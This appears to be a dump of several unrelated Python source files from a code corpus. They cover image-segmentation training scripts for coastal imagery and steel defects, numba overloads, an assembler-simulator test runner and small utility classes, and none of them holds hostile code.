text stringlengths 38 1.54M |
|---|
# Written by Dr Daniel Buscombe, Marda Science LLC
# for the USGS Coastal Change Hazards Program
#
# MIT License
#
# Copyright (c) 2020, Marda Science LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
USE_GPU = True
if USE_GPU == True:
##use the first available GPU
os.environ['CUDA_VISIBLE_DEVICES'] = '0' #'1'
else:
## to use the CPU (not recommended):
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
#suppress tensorflow warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import json
from tkinter import filedialog
from tkinter import *
from random import shuffle
###############################################################
## VARIABLES
###############################################################
root = Tk()
root.filename = filedialog.askopenfilename(initialdir = "/data",title = "Select config file",filetypes = (("config files","*.json"),("all files","*.*")))
configfile = root.filename
print(configfile)
root.withdraw()
root = Tk()
root.filename = filedialog.askdirectory(initialdir = "/samples",title = "Select directory of data files")
data_path = root.filename
print(data_path)
root.withdraw()
weights = configfile.replace('.json','.h5').replace('config', 'weights')
try:
os.mkdir(os.path.dirname(weights))
except:
pass
#---------------------------------------------------
with open(configfile) as f:
config = json.load(f)
for k in config.keys():
exec(k+'=config["'+k+'"]')
if "USE_LOCATION" not in locals():
USE_LOCATION = False
else:
print('Location will be used')
from imports import *
#---------------------------------------------------
trainsamples_fig = weights.replace('.h5','_train_sample_batch.png').replace('weights', 'data')
valsamples_fig = weights.replace('.h5','_val_sample_batch.png').replace('weights', 'data')
hist_fig = weights.replace('.h5','_trainhist_'+str(BATCH_SIZE)+'.png').replace('weights', 'data')
try:
direc = os.path.dirname(hist_fig)
print("Making new directory for example model outputs: %s"% (direc))
os.mkdir(direc)
except:
pass
test_samples_fig = weights.replace('.h5','_val.png').replace('weights', 'data')
#---------------------------------------------------
# learning rate function
def lrfn(epoch):
"""
lrfn(epoch)
This function creates a custom piecewise linear-exponential learning rate function for a custom learning rate scheduler. It is linear to a max, then exponentially decays
* INPUTS: current `epoch` number
* OPTIONAL INPUTS: None
* GLOBAL INPUTS:`START_LR`, `MIN_LR`, `MAX_LR`, `RAMPUP_EPOCHS`, `SUSTAIN_EPOCHS`, `EXP_DECAY`
* OUTPUTS: the function lr with all arguments passed
"""
def lr(epoch, START_LR, MIN_LR, MAX_LR, RAMPUP_EPOCHS, SUSTAIN_EPOCHS, EXP_DECAY):
if epoch < RAMPUP_EPOCHS:
lr = (MAX_LR - START_LR)/RAMPUP_EPOCHS * epoch + START_LR
elif epoch < RAMPUP_EPOCHS + SUSTAIN_EPOCHS:
lr = MAX_LR
else:
lr = (MAX_LR - MIN_LR) * EXP_DECAY**(epoch-RAMPUP_EPOCHS-SUSTAIN_EPOCHS) + MIN_LR
return lr
return lr(epoch, START_LR, MIN_LR, MAX_LR, RAMPUP_EPOCHS, SUSTAIN_EPOCHS, EXP_DECAY)
#-----------------------------------
def load_npz(example):
if N_DATA_BANDS==4:
with np.load(example.numpy()) as data:
image = data['arr_0'].astype('uint8')
image = standardize(image)
nir = data['arr_1'].astype('uint8')
nir = standardize(nir)
label = data['arr_2'].astype('uint8')
image = tf.stack([image, nir], axis=-1)
if USE_LOCATION:
gx,gy = np.meshgrid(np.arange(image.shape[1]), np.arange(image.shape[0]))
loc = np.sqrt(gx**2 + gy**2)
loc /= loc.max()
loc = (255*loc).astype('uint8')
image = np.dstack((image, loc))
mx = np.max(image)
m = np.min(image)
tmp = rescale(loc, m, mx)
image = tf.stack([image[:,:,0], image[:,:,1], image[:,:,2], nir, tmp], axis=-1)
image = tf.cast(image, 'float32')
return image, nir,label
else:
with np.load(example.numpy()) as data:
image = data['arr_0'].astype('uint8')
image = standardize(image)
label = data['arr_1'].astype('uint8')
if USE_LOCATION:
gx,gy = np.meshgrid(np.arange(image.shape[1]), np.arange(image.shape[0]))
loc = np.sqrt(gx**2 + gy**2)
loc /= loc.max()
loc = (255*loc).astype('uint8')
image = np.dstack((image, loc))
image = standardize(image)
mx = np.max(image)
m = np.min(image)
tmp = rescale(loc, m, mx)
image = tf.stack([image[:,:,0], image[:,:,1], image[:,:,2], tmp], axis=-1)
image = tf.cast(image, 'float32')
return image, label
@tf.autograph.experimental.do_not_convert
#-----------------------------------
def read_seg_dataset_multiclass(example):
"""
"read_seg_dataset_multiclass(example)"
This function reads an example from a npz file into a single image and label
INPUTS:
* dataset example object (filename of npz)
OPTIONAL INPUTS: None
GLOBAL INPUTS: TARGET_SIZE
OUTPUTS:
* image [tensor array]
* class_label [tensor array]
"""
if N_DATA_BANDS==4:
image, nir, label = tf.py_function(func=load_npz, inp=[example], Tout=[tf.uint8, tf.uint8, tf.uint8])
nir = tf.cast(nir, tf.float32)#/ 255.0
else:
image, label = tf.py_function(func=load_npz, inp=[example], Tout=[tf.float32, tf.uint8])
# image = tf.cast(image, tf.float32)#/ 255.0
# label = tf.cast(label, tf.uint8)
if N_DATA_BANDS==4:
image = tf.concat([image, tf.expand_dims(nir,-1)],-1)
if NCLASSES==1:
label = tf.expand_dims(label,-1)
#image = tf.image.per_image_standardization(image)
if NCLASSES>1:
if N_DATA_BANDS>1:
return tf.squeeze(image), tf.squeeze(label)
else:
return image, label
else:
return image, label
###############################################################
### main
###############################################################
if USE_GPU == True:
print('GPU name: ', tf.config.experimental.list_physical_devices('GPU'))
print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
#-------------------------------------------------
filenames = tf.io.gfile.glob(data_path+os.sep+ROOT_STRING+'*.npz')
shuffle(filenames)
list_ds = tf.data.Dataset.list_files(filenames, shuffle=False)
val_size = int(len(filenames) * VALIDATION_SPLIT)
validation_steps = val_size // BATCH_SIZE
steps_per_epoch = int(len(filenames) * 1-VALIDATION_SPLIT) // BATCH_SIZE
print(steps_per_epoch)
print(validation_steps)
train_ds = list_ds.skip(val_size)
val_ds = list_ds.take(val_size)
# Set `num_parallel_calls` so multiple images are loaded/processed in parallel.
train_ds = train_ds.map(read_seg_dataset_multiclass, num_parallel_calls=AUTO)
train_ds = train_ds.repeat()
train_ds = train_ds.batch(BATCH_SIZE, drop_remainder=True) # drop_remainder will be needed on TPU
train_ds = train_ds.prefetch(AUTO) #
val_ds = val_ds.map(read_seg_dataset_multiclass, num_parallel_calls=AUTO)
val_ds = val_ds.repeat()
val_ds = val_ds.batch(BATCH_SIZE, drop_remainder=True) # drop_remainder will be needed on TPU
val_ds = val_ds.prefetch(AUTO) #
# if DO_TRAIN:
# # if N_DATA_BANDS<=3:
# for imgs,lbls in train_ds.take(10):
# print(imgs.shape)
# print(lbls.shape)
# plt.figure(figsize=(16,16))
# for imgs,lbls in train_ds.take(100):
# #print(lbls)
# for count,(im,lab) in enumerate(zip(imgs, lbls)):
# plt.subplot(int(BATCH_SIZE+1/2),2,count+1)
# plt.imshow(im)
# if NCLASSES==1:
# plt.imshow(lab, cmap='gray', alpha=0.5, vmin=0, vmax=NCLASSES)
# else:
# lab = np.argmax(lab,-1)
# plt.imshow(lab, cmap='bwr', alpha=0.5, vmin=0, vmax=NCLASSES)
#
# plt.axis('off')
# print(np.unique(lab))
# plt.axis('off')
# plt.close('all')
print('.....................................')
print('Creating and compiling model ...')
if NCLASSES==1:
if USE_LOCATION:
model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS+1), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))
else:
model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))
else:
if USE_LOCATION:
model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS+1), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))
else:
model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))
model.compile(optimizer = 'adam', loss =dice_coef_loss, metrics = [mean_iou, dice_coef])
earlystop = EarlyStopping(monitor="val_loss",
mode="min", patience=PATIENCE)
# set checkpoint file
model_checkpoint = ModelCheckpoint(weights, monitor='val_loss',
verbose=0, save_best_only=True, mode='min',
save_weights_only = True)
# models are sensitive to specification of learning rate. How do you decide? Answer: you don't. Use a learning rate scheduler
lr_callback = tf.keras.callbacks.LearningRateScheduler(lambda epoch: lrfn(epoch), verbose=True)
callbacks = [model_checkpoint, earlystop, lr_callback]
if DO_TRAIN:
print('.....................................')
print('Training model ...')
history = model.fit(train_ds, steps_per_epoch=steps_per_epoch, epochs=MAX_EPOCHS,
validation_data=val_ds, validation_steps=validation_steps,
callbacks=callbacks)
# Plot training history
plot_seg_history_iou(history, hist_fig)
plt.close('all')
K.clear_session()
else:
model.load_weights(weights)
# # ##########################################################
# ### evaluate
print('.....................................')
print('Evaluating model on entire validation set ...')
# # testing
scores = model.evaluate(val_ds, steps=validation_steps)
print('loss={loss:0.4f}, Mean IOU={mean_iou:0.4f}, Mean Dice={mean_dice:0.4f}'.format(loss=scores[0], mean_iou=scores[1], mean_dice=scores[2]))
# # # ##########################################################
IOUc = []
counter = 0
for i,l in val_ds.take(10):
for img,lbl in zip(i,l):
# print(img.shape)
# img = tf.image.per_image_standardization(img)
# if USE_LOCATION:
# img = standardize(img)
# mx = np.max(img)
# m = np.min(img)
# tmp = rescale(loc, m, mx)
# img = tf.stack([img[:,:,0], img[:,:,1], img[:,:,2], tmp], axis=-1)
# else:
# img = standardize(img)
img2 = standardize(img)
est_label = model.predict(tf.expand_dims(img2, 0) , batch_size=1).squeeze()
if NCLASSES==1:
est_label[est_label<.5] = 0
est_label[est_label>.5] = 1
else:
est_label = np.argmax(est_label, -1)
if NCLASSES==1:
lbl = lbl.numpy().squeeze()
else:
lbl = np.argmax(lbl.numpy(), -1)
iouscore = iou(lbl, est_label, NCLASSES+1)
img = rescale(img.numpy(), 0, 1)
if DOPLOT:
plt.subplot(221)
if np.ndim(img)>=3:
plt.imshow(img[:,:,0], cmap='gray')
else:
plt.imshow(img)#, cmap='gray')
if NCLASSES==1:
plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
else:
plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
plt.axis('off')
plt.subplot(222)
if np.ndim(img)>=3:
plt.imshow(img[:,:,0], cmap='gray')
else:
plt.imshow(img)#, cmap='gray')
if NCLASSES==1:
plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
else:
plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
plt.axis('off')
plt.title('iou = '+str(iouscore)[:5], fontsize=6)
IOUc.append(iouscore)
plt.savefig(test_samples_fig.replace('_val.png', '_val_'+str(counter)+'.png'),
dpi=200, bbox_inches='tight')
plt.close('all')
counter += 1
print('Mean IoU (validation subset)={mean_iou:0.3f}'.format(mean_iou=np.mean(IOUc)))
##### training subset
IOUc = []
counter = 0
for i,l in train_ds.take(10):
for img,lbl in zip(i,l):
# print(img.shape)
# img = tf.image.per_image_standardization(img)
# if USE_LOCATION:
# img = standardize(img)
# mx = np.max(img)
# m = np.min(img)
# tmp = rescale(loc, m, mx)
# img = tf.stack([img[:,:,0], img[:,:,1], img[:,:,2], tmp], axis=-1)
# else:
# img = standardize(img)
img2 = standardize(img)
est_label = model.predict(tf.expand_dims(img2, 0) , batch_size=1).squeeze()
if NCLASSES==1:
est_label[est_label<.5] = 0
est_label[est_label>.5] = 1
else:
est_label = np.argmax(est_label, -1)
if NCLASSES==1:
lbl = lbl.numpy().squeeze()
else:
lbl = np.argmax(lbl.numpy(), -1)
iouscore = iou(lbl, est_label, NCLASSES+1)
img = rescale(img.numpy(), 0, 1)
if DOPLOT:
plt.subplot(221)
if np.ndim(img)>=3:
plt.imshow(img[:,:,0], cmap='gray')
else:
plt.imshow(img)#, cmap='gray')
if NCLASSES==1:
plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
else:
plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
plt.axis('off')
plt.subplot(222)
if np.ndim(img)>=3:
plt.imshow(img[:,:,0], cmap='gray')
else:
plt.imshow(img)#, cmap='gray')
if NCLASSES==1:
plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
else:
plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
plt.axis('off')
plt.title('iou = '+str(iouscore)[:5], fontsize=6)
IOUc.append(iouscore)
plt.savefig(test_samples_fig.replace('_val.png', '_train_'+str(counter)+'.png'),
dpi=200, bbox_inches='tight')
plt.close('all')
counter += 1
print('Mean IoU (train subset)={mean_iou:0.3f}'.format(mean_iou=np.mean(IOUc)))
|
from numba.core.extending import overload
from numba.core import types
from numba.misc.special import literally, literal_unroll
from numba.core.errors import TypingError
@overload(literally)
def _ov_literally(obj):
if isinstance(obj, (types.Literal, types.InitialValue)):
return lambda obj: obj
else:
m = "Invalid use of non-Literal type in literally({})".format(obj)
raise TypingError(m)
@overload(literal_unroll)
def literal_unroll_impl(container):
if isinstance(container, types.Poison):
m = f"Invalid use of non-Literal type in literal_unroll({container})"
raise TypingError(m)
def impl(container):
return container
return impl
|
import os
from time import time
class ProjectPath:
base = os.path.dirname(os.path.dirname(__file__))
def __init__(self, logdir):
self.logdir = logdir
from time import localtime, strftime
self.timestamp = strftime("%B_%d__%H_%M", localtime())
self.model_path = os.path.join(ProjectPath.base, self.logdir, self.timestamp)
class Timer:
def __init__(self):
self.curr_time = time()
def time(self):
diff = time() - self.curr_time
self.curr_time = time()
return diff
|
#!/usr/bin/env python3
import os
import os.path
import subprocess
import sys
import pyparsing as pp
MARK = "|@|"
MARK_ARGS = ";;;@;;;"
root = os.path.dirname(sys.argv[0])
ASM = os.path.join(root, "asm")
SIM = os.path.join(root, "sim")
errors = [0]
def error(msg):
print("error: %s" % msg)
errors[0] += 1
def grammer():
lparen = pp.Suppress("(")
rparen = pp.Suppress(")")
equal = pp.Suppress("=")
nl = pp.Suppress(pp.LineEnd())
reg = pp.Combine("$" + pp.Optional("cr") + pp.Word(pp.srange("[0-7]"),
max=1))
num = pp.Word(pp.srange("[0-9]")).setParseAction(
lambda s, l, t: int(t[0]))
val = pp.Word(pp.srange("[0-9a-fA-F]")).setParseAction(
lambda s, l, t: int(t[0], 16))
values = pp.Dict(pp.OneOrMore(pp.Group(reg + equal + val)))
return num + lparen + values + rparen + nl
def parse(stream):
g = grammer()
results = {}
sim_args = ""
first_line = True
for line in stream:
if first_line and MARK_ARGS in line:
colon = line.find(":") + 1
sim_args = line[colon:]
first_line = False
if MARK in line:
subline = line[line.find(MARK) + len(MARK):]
res = g.parseString(subline)
results[res[0]] = res
return results, sim_args
def build_command(exe, clocks, args):
trace_file = exe.replace(".o", ".trace.log")
return """
{sim} {exe} --no-debugger
--test-clock {clocks}
--stop-clock {stop}
--trace {trace}
{args}
""".format(
sim=SIM,
exe=exe,
clocks=" ".join(map(str, clocks)),
stop=max(clocks),
trace=trace_file,
args=args
).replace("\n", "").strip()
def simulate(exe, clocks, sim_args):
cmd = build_command(exe, clocks, sim_args)
output = do_proc(cmd)
for line in output.split("\n"):
if not line.strip():
continue
yield MARK + line
def asserts(output, checks):
for clock, values in sorted(checks.items()):
try:
result = output[clock]
for key, value in sorted(values.items()):
if value != result[key]:
error("@%d %s expected %04X got %04X" % (
clock, key, value, result[key]))
except KeyError:
error("clock %s not found in output" % clock)
def do_proc(cmd):
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
raw_output, _ = proc.communicate()
output = raw_output.decode("utf-8")
if proc.returncode != 0:
print(output, end=' ')
raise Exception("Return code %d received from '%s'" % (
proc.returncode, cmd))
return output
def main(args):
if len(args) != 2:
print("USAGE: %s testfile.asm testfile.o" % sys.argv[0])
return 2
asm_filename = args[0]
exe_filename = args[1]
if not os.path.exists(asm_filename):
print("ERROR: could not open file: " + asm_filename)
return 1
if not os.path.exists(exe_filename):
print("ERROR: could not open file: " + exe_filename)
return 1
try:
checks, sim_args = parse(open(asm_filename))
if not checks:
print("ERROR: no checks found in " + asm_filename)
return 1
output = simulate(exe_filename, list(checks.keys()), sim_args)
output, _ = parse(output)
asserts(output, checks)
except (pp.ParseException, pp.ParseFatalException) as err:
print(err.line)
print(" " * (err.column - 1) + "^")
print(err)
return 1
return errors[0]
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
def csv(a):
print "FILE NAME IS:::"
print a
b = []
f = open(a, 'r')
for i in f.readlines():
b.append(i)
print [i.split('!') for i in b]
csv("eg.txt")
|
import asyncio
import sys
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from ntpan.config import params
from ntpan.log import log
from ntpan.main import collect
if __name__ == "__main__":
scheduler = AsyncIOScheduler()
scheduler.add_job(collect, "interval", minutes=params.run_interval, id="ntpan")
scheduler.start()
try:
log.success("Starting NTPAN...")
asyncio.get_event_loop().run_forever()
except (KeyboardInterrupt, SystemExit):
log.critical("Stopping NTPAN...")
sys.exit(1)
|
class Cell:
num = 0
def __init__(self, num):
self.num = num
def __add__(self, other):
if (type(self) != type(other)):
raise TypeError('Both arguments must be ceils')
return Cell(self.num + other.num)
def __sub__(self, other):
if (type(self) != type(other)):
raise TypeError('Both arguments must be ceils')
num = self.num - other.num
if (num < 1):
raise TypeError('Second cell musb be smaller than first')
return Cell(num)
def __mul__(self, other):
if (type(self) != type(other)):
raise TypeError('Both arguments must be ceils')
return Cell(self.num * other.num)
def __truediv__(self, other):
if (type(self) != type(other)):
raise TypeError('Both arguments must be ceils')
num = self.num // other.num
if (num < 1):
raise TypeError('Second cell musb be smaller than first')
return Cell(num)
def make_order(self, in_row):
full = self.num // in_row
rest = self.num % in_row
a_row = '*' * in_row
full_rows = list(map(lambda _: a_row, range(full)))
full_rows.append('*' * rest)
print('full_rows', full_rows)
return '\n'.join(filter(None, full_rows))
|
import glob
import os
import cv2
import argparse
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.model_selection import train_test_split
from tqdm import tqdm
from albumentations import (Compose, Flip, HorizontalFlip, Normalize,
RandomBrightnessContrast, RandomBrightness, RandomContrast, RandomGamma, OneOf, ToFloat,
RandomSizedCrop, ShiftScaleRotate)
import copy
from bayes_opt import BayesianOptimization
import torch
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import torchvision.models as models
from torch import nn
from torch.optim.lr_scheduler import ReduceLROnPlateau
from dataset import SteelDataset, BalanceClassSamplerMultilabel
from unet import Unet
from metric import dice_metric
from utils import mask2rle, rle2mask, plot_mask, analyze_labels, seed_everything, print2file
from loss import criterion_wbce_dice, criterion_wbce_lovasz, criterion_wmse, criterion_wbce, loss_BCE, loss_dice, loss_lovasz, loss_BCE_dice, loss_BCE_lovasz
from evaluate import Evaluate
def evaluate_batch(data, outputs, args, threshold = 0.5):
if args.output == 0:
masks = data[1].detach().cpu().numpy()
pred_masks = (torch.sigmoid(outputs).detach().cpu().numpy() > threshold).astype(int)
# print(masks.shape, pred_masks.shape)
return dice_metric(masks, pred_masks), 0.0
elif args.output == 1:
masks = data[1].detach().cpu().numpy()
labels = data[2].detach().cpu().numpy()
pred_masks = (torch.sigmoid(outputs[0]).detach().cpu().numpy() > threshold).astype(int)
pred_labels = outputs[1].detach().cpu().numpy()
return dice_metric(masks, pred_masks), np.sum(np.sqrt((pred_labels-labels)**2))
elif args.output == 2: # classification
masks = data[1].detach().cpu().numpy()
labels = data[2].detach().cpu().numpy()
pred_masks = (torch.sigmoid(outputs[0]).detach().cpu().numpy() > threshold).astype(int)
pred_labels = (torch.sigmoid(outputs[1]).detach().cpu().numpy() > threshold).astype(int)
return dice_metric(masks, pred_masks), np.sum((pred_labels == labels).astype(int))
def evaluate_loader(net, device, dataloader, args):
loss, dice, other = 0.0, 0.0, 0.0
with torch.no_grad():
for data in dataloader:
images = data[0].to(device).permute(0, 3, 1, 2)
outputs = net(images)
loss += compute_loss(args, outputs, data).item()
res = evaluate_batch(data, outputs, args)
dice, other = dice + res[0], other + res[1]
return loss, dice, other
def compute_loss(args, outputs, data, acc_step = 1):
'compute the loss function'
# loss function, loss_BCE, loss_dice, loss_lovasz, loss_BCE_dice, loss_BCE_lovasz
if args.loss == 0:
criterion = nn.BCEWithLogitsLoss()
# obtain the mask
masks = data[1].to(device)
# there is a second task
if args.output == 1 or args.output == 2:
labels = data[2].to(device)
outputs_mask = outputs[0]
outputs_other = outputs[1]
else:
outputs_mask = outputs
masks = masks.permute(0, 3, 1, 2)
# different segmentation losses
if args.loss == 0:
loss = criterion(outputs_mask, masks) / acc_step
elif args.loss == 1:
loss = criterion_wbce_dice(outputs_mask, masks) / acc_step
elif args.loss == 2:
loss = criterion_wbce_lovasz(outputs_mask, masks) / acc_step
elif args.loss == 3:
loss = loss_lovasz(outputs_mask, masks) / acc_step
else:
raise NotImplementedError
# output
if args.output == 1:
loss += 0.2 * criterion_wmse(outputs_other, labels)
elif args.output == 2:
loss += 0.2 * criterion_wbce(outputs_other, labels)
else:
raise NotImplementedError
return loss
def train_net(net, optimizer, device, args, LOG_FILE, MODEL_FILE):
# output regression information
history = {'Train_loss':[], 'Train_dice':[], 'Train_other':[], 'Valid_loss':[], 'Valid_dice':[], 'Valid_other':[]}
# scheduler
if args.sch == 1:
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [args.epoch//2, args.epoch*3//4], gamma = 0.35)
elif args.sch == 2:
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epoch, 1e-4)
val_dice_best = -float('inf')
# main iteration
for epoch in range(args.epoch): # loop over the dataset multiple times
net.train()
running_loss, running_dice, running_other = 0.0, 0.0, 0.0
tk0 = tqdm(enumerate(trainloader), total = len(trainloader), leave = False)
# zero the gradient
optimizer.zero_grad()
# iterate over all samples
for i, data in tk0:
# get the inputs; data is a list of [inputs, labels]
images = data[0].to(device).permute(0, 3, 1, 2)
# forward + backward + optimize
outputs = net(images)
# do not accumulate the gradient
if not args.accumulate:
# different ways of handling the outputs
loss = compute_loss(args, outputs, data, acc_step = 1)
loss.backward()
optimizer.step()
optimizer.zero_grad()
batch_loss = loss.item()
# do accumulation
else:
acc_step = 64//args.batch
loss = compute_loss(args, outputs, data, acc_step = acc_step)
loss.backward()
if (i+1)%acc_step == 0:
optimizer.step()
optimizer.zero_grad()
batch_loss = loss.item() * acc_step
# print statistics
batch_dice, batch_other = evaluate_batch(data, outputs, args)
running_loss += batch_loss
running_dice += batch_dice
running_other += batch_other
tk0.set_postfix(info = 'Loss {:.3f}, Dice {:.3f}, Other {:.3f}'.format(batch_loss, batch_dice, batch_other))
# stochastic weight averaging
if args.swa > 0 and epoch >= args.epoch-args.swa:
epoch_tmp = args.epoch-args.swa
if epoch == epoch_tmp:
net_swa = copy.deepcopy(net.state_dict())
else:
for key, val in net_swa.items():
net_swa[key] = ((epoch-epoch_tmp)*val+net.state_dict()[key])/(epoch-epoch_tmp+1)
# after every epoch, print the statistics
net.eval()
val_loss, val_dice, val_other = evaluate_loader(net, device, validloader, args)
# save the best up to now
if val_dice > val_dice_best:
print('Improving val_dice from {:.3f} to {:.3f}, saving the model'.format(val_dice_best/len(VALID_FILES)/args.category, val_dice/len(VALID_FILES)/args.category))
val_dice_best = val_dice
torch.save(net.state_dict(),MODEL_FILE)
# update the learning rate
if args.sch > 0:
scheduler.step()
# update the history and output message
history['Train_loss'].append(running_loss / len(trainloader))
history['Valid_loss'].append(val_loss / len(validloader))
history['Train_dice'].append(running_dice / len(TRAIN_FILES) / args.category) # four categories
history['Valid_dice'].append(val_dice / len(VALID_FILES) / args.category)
history['Train_other'].append(running_other / len(TRAIN_FILES) / args.category)
history['Valid_other'].append(val_other / len(VALID_FILES) / args.category)
sout = '\nEpoch {:d} :'.format(epoch)+' '.join(key+':{:.3f}'.format(val[-1]) for key,val in history.items())
print2file(sout, LOG_FILE)
print(sout)
if args.swa > 0:
return net_swa, history
else:
return net.state_dict(), history
if __name__ == '__main__':
# argsparse
parser = argparse.ArgumentParser()
parser.add_argument('--normalize', action = 'store_true', default = False, help = 'Normalize the images or not')
parser.add_argument('--accumulate', action = 'store_false', default = True, help = 'Not doing gradient accumulation or not')
parser.add_argument('--bayes_opt', action = 'store_true', default = False, help = 'Do Bayesian optimization in finding hyper-parameters')
parser.add_argument('-l','--load_mod',action = 'store_true', default = False, help = 'Load a pre-trained model')
parser.add_argument('-t','--test_run',action = 'store_true', default = False, help = 'Run the script quickly to check all functions')
parser.add_argument('--sampler', action = 'store_true', default = False, help = 'Use sampler in the algorithm.')
parser.add_argument('--evaluate', action = 'store_false', default = True, help = 'Evaluate the third category only.')
parser.add_argument('--conservative', action = 'store_true', default = False, help = 'Use conservative augmentations.')
parser.add_argument('--use_weight', action = 'store_true', default = False, help = 'Use weights in evaluation.')
parser.add_argument('--wlovasz', type = float,default = 0.2, help = 'The weight used in Lovasz loss')
parser.add_argument('--augment', type = int, default = 0, help = 'The type of train augmentations: 0 vanilla, 1 add contrast, 2 add ')
parser.add_argument('--loss', type = int, default = 0, help = 'The loss: 0 BCE vanilla; 1 wbce+dice; 2 wbce+lovasz.')
parser.add_argument('--sch', type = int, default = 2, help = 'The schedule of the learning rate: 0 step; 1 cosine annealing; 2 cosine annealing with warmup.')
parser.add_argument('-m', '--model', type = str, default = 'resnet34', help = 'The backbone network of the neural network.')
parser.add_argument('-e', '--epoch', type = int, default = 5, help = 'The number of epochs in the training')
parser.add_argument('--height', type = int, default = 256, help = 'The height of the image')
parser.add_argument('--width', type = int, default = 1600, help = 'The width of the image')
parser.add_argument('--category', type = int, default = 4, help = 'The category of the problem')
parser.add_argument('-b', '--batch', type = int, default = 8, help = 'The batch size of the training')
parser.add_argument('-s','--swa', type = int, default = 4, help = 'The number of epochs for stochastic weight averaging')
parser.add_argument('-o','--output', type = int, default = 2, help = 'The type of the network, 0 vanilla, 1 add regression, 2 add classification.')
parser.add_argument('--seed', type = int, default = 1234, help = 'The random seed of the algorithm.')
parser.add_argument('--sample_times',type = int, default = 1, help = 'The sampling times of sampler.')
parser.add_argument('--sample_ratio',type = float,default = 0.4, help = 'The sampling ratio of the third class.')
args = parser.parse_args()
seed_everything(seed = args.seed)
print('===========================')
for key, val in vars(args).items():
print('{}: {}'.format(key, val))
print('===========================\n')
# input folder paths
TRAIN_PATH = '../input/severstal-steel-defect-detection/train_images/'
TEST_PATH = '../input/severstal-steel-defect-detection/test_images/'
TRAIN_MASKS = '../input/severstal-steel-defect-detection/train.csv'
# ouput folder paths
dicSpec = {'m_':args.model, 'con_':int(args.conservative),'r_':int(10*args.sample_ratio), 's_':int(args.sampler), 'e_':args.epoch, 'sch_':args.sch, 'loss_':args.loss}
strSpec = '_'.join(key+str(val) for key,val in dicSpec.items())
VALID_ID_FILE = '../output/validID_{:s}.csv'.format(strSpec)
MODEL_FILE = '../output/model_{:s}.pth'.format(strSpec)
MODEL_SWA_FILE= '../output/model_swa_{:s}.pth'.format(strSpec)
HISTORY_FILE = '../output/history_{:s}.csv'.format(strSpec)
LOG_FILE = '../output/log_{:s}.txt'.format(strSpec)
# rewrite the file if not load mod
if not args.load_mod:
with open(LOG_FILE, 'w') as fopen:
fopen.write(strSpec+'\n')
# find all files in the directory
TRAIN_FILES_ALL = sorted(glob.glob(TRAIN_PATH+'*.jpg'))
TEST_FILES = sorted(glob.glob(TEST_PATH+'*.jpg'))
# read in the masks
mask_df = pd.read_csv(TRAIN_MASKS).set_index(['ImageId_ClassId']).fillna('-1')
print(mask_df.head())
print('===========================\n')
########################################################################
# if test run a small version
if args.test_run:
rows = 32
else:
rows = len(TRAIN_FILES_ALL)
# load validation id
X_valid = list(pd.read_csv('validID.csv')['Valid'])[:rows]
X_train = list(set(np.arange(len(TRAIN_FILES_ALL))) - set(X_valid))[:rows]
# get the train and valid files
TRAIN_FILES = [TRAIN_FILES_ALL[i] for i in X_train]
VALID_FILES = [TRAIN_FILES_ALL[i] for i in X_valid]
steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df)
stat_df_valid = steel_ds_valid.stat_images(rows)
# print statistics
sout = '======== Validation Stat ==========\n' + analyze_labels(stat_df_valid)+'\n'
print2file(sout, LOG_FILE)
# not using sophisticated normalize
if not args.normalize:
train_mean, train_std = 0, 1
test_mean, test_std = 0, 1
else:
train_mean, train_std = 0.3438812517320016, 0.056746666005067205
test_mean, test_std = 0.25951299299868136, 0.051800296725619116
